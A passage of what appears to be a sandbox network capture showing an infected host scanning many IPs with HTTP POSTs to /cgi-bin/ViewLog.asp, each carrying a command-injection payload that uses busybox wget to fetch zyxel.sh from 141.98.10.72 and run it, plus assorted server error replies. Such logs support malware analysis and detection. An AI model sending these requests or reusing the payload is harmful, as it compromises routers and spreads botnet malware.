61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 42 65 73 63 68 72 65 69 62 75 6e 67 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 37 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="de"><head><title>HTTP Status 404 nicht gefunden</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 nicht gefunden</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Beschreibung</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.27</h3></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1031192.168.2.154357294.121.96.2298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.149235010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1032192.168.2.155605294.122.64.1118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.152973890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1033192.168.2.155980831.204.128.2528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.335724115 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.528786898 CET146INHTTP/1.1 307 Temporary Redirect
                                                      Location: /containers/
                                                      Date: Wed, 14 Feb 2024 08:31:14 GMT
                                                      Content-Length: 0
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1034192.168.2.155314694.107.34.98080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.357861996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1035192.168.2.155253631.200.34.158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.390201092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1036192.168.2.155863094.121.73.1348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.390599966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1037192.168.2.155680031.133.206.208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.392656088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.646519899 CET412INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:31:14 GMT
                                                      Server: Apache/2.4.43 (Win64)
                                                      Content-Length: 196
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1038192.168.2.154670294.123.34.1238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.398706913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1039192.168.2.153392294.46.181.1558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.567939043 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.780554056 CET1286INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:14 GMT
                                                      Server: Apache
                                                      Accept-Ranges: bytes
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: 0
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1040192.168.2.154484295.86.110.2458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.589430094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1041192.168.2.154029094.26.12.848080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.611027956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:15.767026901 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:17.110977888 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:19.959001064 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:25.334949017 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:36.086689949 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:59.125998020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1042192.168.2.155569685.31.112.1288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.614785910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1043192.168.2.153583894.122.29.58080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.636992931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


